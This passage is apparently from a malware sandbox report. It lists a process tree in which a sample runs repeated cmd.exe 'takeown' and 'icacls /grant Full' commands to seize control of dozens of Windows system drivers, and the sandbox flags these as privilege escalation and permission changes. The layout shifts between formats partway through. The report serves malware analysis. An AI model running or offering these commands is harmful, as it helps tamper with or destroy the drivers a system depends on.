    [depth 3] C:\Windows\system32\icacls.exe (PID 5152): icacls C:\Windows\System32\drivers\mpio.sys /grant "Admin:F"
        - Modifies file permissions

[depth 2] C:\Windows\System32\cmd.exe (PID 4876): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mpsdrv.sys && icacls C:\Windows\System32\drivers\mpsdrv.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4308): takeown /f C:\Windows\System32\drivers\mpsdrv.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 4036): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxdav.sys && icacls C:\Windows\System32\drivers\mrxdav.sys /grant "%username%:F" && exit
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mrxdav.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4980
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mrxdav.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb.sys && icacls C:\Windows\System32\drivers\mrxsmb.sys /grant "%username%:F" && exit2⤵PID:4000
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mrxsmb.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4400
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mrxsmb.sys /grant "Admin:F"3⤵PID:5168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb10.sys && icacls C:\Windows\System32\drivers\mrxsmb10.sys /grant "%username%:F" && exit2⤵PID:4352
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mrxsmb10.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb20.sys && icacls C:\Windows\System32\drivers\mrxsmb20.sys /grant "%username%:F" && exit2⤵PID:4552
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mrxsmb20.sys3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msahci.sys && icacls C:\Windows\System32\drivers\msahci.sys /grant "%username%:F" && exit2⤵PID:4852
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msahci.sys3⤵
- Modifies file permissions
PID:5296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msdsm.sys && icacls C:\Windows\System32\drivers\msdsm.sys /grant "%username%:F" && exit2⤵PID:4972
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msdsm.sys3⤵PID:5304
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msfs.sys && icacls C:\Windows\System32\drivers\msfs.sys /grant "%username%:F" && exit2⤵PID:5144
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msfs.sys3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5320
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msfs.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:5356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf && icacls C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf /grant "%username%:F" && exit2⤵PID:5200
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf3⤵PID:5428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mshidkmdf.sys && icacls C:\Windows\System32\drivers\mshidkmdf.sys /grant "%username%:F" && exit2⤵PID:5232
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mshidkmdf.sys3⤵
- Modifies file permissions
PID:5480
-
-
-
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msisadrv.sys && icacls C:\Windows\System32\drivers\msisadrv.sys /grant "%username%:F" && exit
PID:5260

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\msisadrv.sys
    PID:5472

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msiscsi.sys && icacls C:\Windows\System32\drivers\msiscsi.sys /grant "%username%:F" && exit
PID:5312

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\msiscsi.sys
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:5508

    C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\drivers\msiscsi.sys /grant "Admin:F"
    PID:5600

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mskssrv.sys && icacls C:\Windows\System32\drivers\mskssrv.sys /grant "%username%:F" && exit
PID:5380

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\mskssrv.sys
    - Suspicious use of AdjustPrivilegeToken
    PID:5520

    C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\drivers\mskssrv.sys /grant "Admin:F"
    PID:5640

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mspclock.sys && icacls C:\Windows\System32\drivers\mspclock.sys /grant "%username%:F" && exit
PID:5408

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\mspclock.sys
    - Suspicious use of AdjustPrivilegeToken
    PID:5532

    C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\drivers\mspclock.sys /grant "Admin:F"
    - Modifies file permissions
    PID:5612

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mspqm.sys && icacls C:\Windows\System32\drivers\mspqm.sys /grant "%username%:F" && exit
PID:5448

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\mspqm.sys
    - Possible privilege escalation attempt
    PID:5620

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msrpc.sys && icacls C:\Windows\System32\drivers\msrpc.sys /grant "%username%:F" && exit
PID:5496

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\msrpc.sys
    PID:5840

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mssmbios.sys && icacls C:\Windows\System32\drivers\mssmbios.sys /grant "%username%:F" && exit
PID:5540

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\mssmbios.sys
    - Modifies file permissions
    PID:5804

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mstee.sys && icacls C:\Windows\System32\drivers\mstee.sys /grant "%username%:F" && exit
PID:5580

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\mstee.sys
    PID:5976

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MTConfig.sys && icacls C:\Windows\System32\drivers\MTConfig.sys /grant "%username%:F" && exit
PID:5628

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\MTConfig.sys
    PID:5832

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mup.sys && icacls C:\Windows\System32\drivers\mup.sys /grant "%username%:F" && exit
PID:5700

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\mup.sys
    PID:5940

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndis.sys && icacls C:\Windows\System32\drivers\ndis.sys /grant "%username%:F" && exit
PID:5728

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\ndis.sys
    PID:5992

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndiscap.sys && icacls C:\Windows\System32\drivers\ndiscap.sys /grant "%username%:F" && exit
PID:5752

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\ndiscap.sys
    PID:6004

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndistapi.sys && icacls C:\Windows\System32\drivers\ndistapi.sys /grant "%username%:F" && exit
PID:5780

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\ndistapi.sys
    - Suspicious use of AdjustPrivilegeToken
    PID:6052

    C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\drivers\ndistapi.sys /grant "Admin:F"
    - Modifies file permissions
    PID:6120

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndisuio.sys && icacls C:\Windows\System32\drivers\ndisuio.sys /grant "%username%:F" && exit
PID:5824

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\ndisuio.sys
    PID:6088

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndiswan.sys && icacls C:\Windows\System32\drivers\ndiswan.sys /grant "%username%:F" && exit
PID:5876

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\ndiswan.sys
    - Suspicious use of AdjustPrivilegeToken
    PID:6072

    C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\drivers\ndiswan.sys /grant "Admin:F"
    - Possible privilege escalation attempt
    PID:5212

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndproxy.sys && icacls C:\Windows\System32\drivers\ndproxy.sys /grant "%username%:F" && exit
PID:5916

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\ndproxy.sys
    - Suspicious use of AdjustPrivilegeToken
    PID:6080

    C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\drivers\ndproxy.sys /grant "Admin:F"
    - Possible privilege escalation attempt
    PID:5156

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netbios.sys && icacls C:\Windows\System32\drivers\netbios.sys /grant "%username%:F" && exit
PID:5956

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\netbios.sys
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:6064

    C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\drivers\netbios.sys /grant "Admin:F"
    - Modifies file permissions
    PID:4808
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netbt.sys && icacls C:\Windows\System32\drivers\netbt.sys /grant "%username%:F" && exit
PID:6016

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\netbt.sys
    PID:5192

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netio.sys && icacls C:\Windows\System32\drivers\netio.sys /grant "%username%:F" && exit
PID:6044

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\netio.sys
    PID:5268

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nfrd960.sys && icacls C:\Windows\System32\drivers\nfrd960.sys /grant "%username%:F" && exit
PID:6108

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\nfrd960.sys
    PID:5352

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\npfs.sys && icacls C:\Windows\System32\drivers\npfs.sys /grant "%username%:F" && exit
PID:5076

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\npfs.sys
    - Possible privilege escalation attempt
    - Suspicious use of AdjustPrivilegeToken
    PID:5476

    C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\drivers\npfs.sys /grant "Admin:F"
    PID:5524

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nsiproxy.sys && icacls C:\Windows\System32\drivers\nsiproxy.sys /grant "%username%:F" && exit
PID:4168

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\nsiproxy.sys
    - Suspicious use of AdjustPrivilegeToken
    PID:5424

    C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\drivers\nsiproxy.sys /grant "Admin:F"
    - Modifies file permissions
    PID:5532

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ntfs.sys && icacls C:\Windows\System32\drivers\ntfs.sys /grant "%username%:F" && exit
PID:5064

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\ntfs.sys
    PID:5508

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\null.sys && icacls C:\Windows\System32\drivers\null.sys /grant "%username%:F" && exit
PID:4308

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\null.sys
    PID:5616

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nvraid.sys && icacls C:\Windows\System32\drivers\nvraid.sys /grant "%username%:F" && exit
PID:5276

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\nvraid.sys
    PID:5316

    C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\drivers\nvraid.sys /grant "Admin:F"
    PID:5444

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nvstor.sys && icacls C:\Windows\System32\drivers\nvstor.sys /grant "%username%:F" && exit
PID:5356

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\nvstor.sys
    PID:5740

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\NV_AGP.SYS && icacls C:\Windows\System32\drivers\NV_AGP.SYS /grant "%username%:F" && exit
PID:5480

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\NV_AGP.SYS
    - Possible privilege escalation attempt
    PID:5464

    C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\drivers\NV_AGP.SYS /grant "Admin:F"
    PID:5284

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nwifi.sys && icacls C:\Windows\System32\drivers\nwifi.sys /grant "%username%:F" && exit
PID:5644

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\nwifi.sys
    PID:6120

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ohci1394.sys && icacls C:\Windows\System32\drivers\ohci1394.sys /grant "%username%:F" && exit
PID:5364

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\ohci1394.sys
    - Modifies file permissions
    PID:5980

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pacer.sys && icacls C:\Windows\System32\drivers\pacer.sys /grant "%username%:F" && exit
PID:5556

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\pacer.sys
    PID:6088

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\parport.sys && icacls C:\Windows\System32\drivers\parport.sys /grant "%username%:F" && exit
PID:5808

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\parport.sys
    PID:6104

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\partmgr.sys && icacls C:\Windows\System32\drivers\partmgr.sys /grant "%username%:F" && exit
PID:5928

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\partmgr.sys
    PID:6036

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pci.sys && icacls C:\Windows\System32\drivers\pci.sys /grant "%username%:F" && exit
PID:6008

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\pci.sys
    PID:5888

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pciide.sys && icacls C:\Windows\System32\drivers\pciide.sys /grant "%username%:F" && exit
PID:6052

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\pciide.sys
    - Modifies file permissions
    PID:4112

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pciidex.sys && icacls C:\Windows\System32\drivers\pciidex.sys /grant "%username%:F" && exit
PID:6092

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\pciidex.sys
    PID:5144

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pcmcia.sys && icacls C:\Windows\System32\drivers\pcmcia.sys /grant "%username%:F" && exit
PID:5256

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\pcmcia.sys
    PID:5588

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pcw.sys && icacls C:\Windows\System32\drivers\pcw.sys /grant "%username%:F" && exit
PID:5960

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\pcw.sys
    PID:1320

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\PEAuth.sys && icacls C:\Windows\System32\drivers\PEAuth.sys /grant "%username%:F" && exit
PID:5948

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\PEAuth.sys
    PID:5612

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\portcls.sys && icacls C:\Windows\System32\drivers\portcls.sys /grant "%username%:F" && exit
PID:5956

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\portcls.sys
    PID:5388

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\processr.sys && icacls C:\Windows\System32\drivers\processr.sys /grant "%username%:F" && exit
PID:5268

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\processr.sys
    PID:5604

    C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\drivers\processr.sys /grant "Admin:F"
    PID:4400
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ql2300.sys && icacls C:\Windows\System32\drivers\ql2300.sys /grant "%username%:F" && exit
PID:5560

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\ql2300.sys
    PID:5376

    C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\drivers\ql2300.sys /grant "Admin:F"
    PID:5740

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ql40xx.sys && icacls C:\Windows\System32\drivers\ql40xx.sys /grant "%username%:F" && exit
PID:5076

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\ql40xx.sys
    - Modifies file permissions
    PID:5524

    C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\drivers\ql40xx.sys /grant "Admin:F"
    PID:5604

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\qwavedrv.sys && icacls C:\Windows\System32\drivers\qwavedrv.sys /grant "%username%:F" && exit
PID:4776

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\qwavedrv.sys
    - Suspicious use of AdjustPrivilegeToken
    PID:5588

    C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\drivers\qwavedrv.sys /grant "Admin:F"
    PID:5620

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rasacd.sys && icacls C:\Windows\System32\drivers\rasacd.sys /grant "%username%:F" && exit
PID:5312

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\rasacd.sys
    PID:6036

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rasl2tp.sys && icacls C:\Windows\System32\drivers\rasl2tp.sys /grant "%username%:F" && exit
PID:5308

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\rasl2tp.sys
    PID:5484

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\raspppoe.sys && icacls C:\Windows\System32\drivers\raspppoe.sys /grant "%username%:F" && exit
PID:5836

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\raspppoe.sys
    PID:5980

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\raspptp.sys && icacls C:\Windows\System32\drivers\raspptp.sys /grant "%username%:F" && exit
PID:5844

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\raspptp.sys
    PID:4660

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rassstp.sys && icacls C:\Windows\System32\drivers\rassstp.sys /grant "%username%:F" && exit
PID:5164

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\rassstp.sys
    PID:5424

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdbss.sys && icacls C:\Windows\System32\drivers\rdbss.sys /grant "%username%:F" && exit
PID:6012

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\rdbss.sys
    - Suspicious use of AdjustPrivilegeToken
    PID:6056

    C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\drivers\rdbss.sys /grant "Admin:F"
    PID:5484

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpbus.sys && icacls C:\Windows\System32\drivers\rdpbus.sys /grant "%username%:F" && exit
PID:5612

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\rdpbus.sys
    - Modifies file permissions
    PID:5616

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RDPCDD.sys && icacls C:\Windows\System32\drivers\RDPCDD.sys /grant "%username%:F" && exit
PID:5740

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\RDPCDD.sys
    PID:5980

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpdr.sys && icacls C:\Windows\System32\drivers\rdpdr.sys /grant "%username%:F" && exit
PID:5324

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\rdpdr.sys
    - Possible privilege escalation attempt
    PID:5520

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RDPENCDD.sys && icacls C:\Windows\System32\drivers\RDPENCDD.sys /grant "%username%:F" && exit
PID:5180

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\RDPENCDD.sys
    - Suspicious use of AdjustPrivilegeToken
    PID:6200

    C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\drivers\RDPENCDD.sys /grant "Admin:F"
    PID:6248

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RDPREFMP.sys && icacls C:\Windows\System32\drivers\RDPREFMP.sys /grant "%username%:F" && exit
PID:5240

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\RDPREFMP.sys
    PID:6056

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpvideominiport.sys && icacls C:\Windows\System32\drivers\rdpvideominiport.sys /grant "%username%:F" && exit
PID:4968

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\rdpvideominiport.sys
    PID:5520

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpwd.sys && icacls C:\Windows\System32\drivers\rdpwd.sys /grant "%username%:F" && exit
PID:5572

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\rdpwd.sys
    - Suspicious use of AdjustPrivilegeToken
    PID:6188

    C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\drivers\rdpwd.sys /grant "Admin:F"
    PID:6240

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdyboost.sys && icacls C:\Windows\System32\drivers\rdyboost.sys /grant "%username%:F" && exit
PID:4532

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\rdyboost.sys
    PID:6172

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rmcast.sys && icacls C:\Windows\System32\drivers\rmcast.sys /grant "%username%:F" && exit
PID:5160

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\rmcast.sys
    - Modifies file permissions
    PID:6272

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RNDISMP.sys && icacls C:\Windows\System32\drivers\RNDISMP.sys /grant "%username%:F" && exit
PID:5656

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\RNDISMP.sys
    - Modifies file permissions
    PID:6320

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rootmdm.sys && icacls C:\Windows\System32\drivers\rootmdm.sys /grant "%username%:F" && exit
PID:6156

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\rootmdm.sys
    - Suspicious use of AdjustPrivilegeToken
    PID:6348

    C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\drivers\rootmdm.sys /grant "Admin:F"
    PID:6368

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rspndr.sys && icacls C:\Windows\System32\drivers\rspndr.sys /grant "%username%:F" && exit
PID:6220

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\rspndr.sys
    - Possible privilege escalation attempt
    PID:6404
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Rtnic64.sys && icacls C:\Windows\System32\drivers\Rtnic64.sys /grant "%username%:F" && exit
PID:6288

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\Rtnic64.sys
    PID:6440

    C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\drivers\Rtnic64.sys /grant "Admin:F"
    PID:6456

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sbp2port.sys && icacls C:\Windows\System32\drivers\sbp2port.sys /grant "%username%:F" && exit
PID:6328

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\sbp2port.sys
    PID:6504

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\scfilter.sys && icacls C:\Windows\System32\drivers\scfilter.sys /grant "%username%:F" && exit
PID:6380

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\scfilter.sys
    PID:6532

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\scsiport.sys && icacls C:\Windows\System32\drivers\scsiport.sys /grant "%username%:F" && exit
PID:6424

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\scsiport.sys
    PID:6572

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\secdrv.sys && icacls C:\Windows\System32\drivers\secdrv.sys /grant "%username%:F" && exit
PID:6476

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\secdrv.sys
    - Possible privilege escalation attempt
    PID:6616

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\serenum.sys && icacls C:\Windows\System32\drivers\serenum.sys /grant "%username%:F" && exit
PID:6516

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\serenum.sys
    PID:6656

C:\Windows\System32\cmd.exe
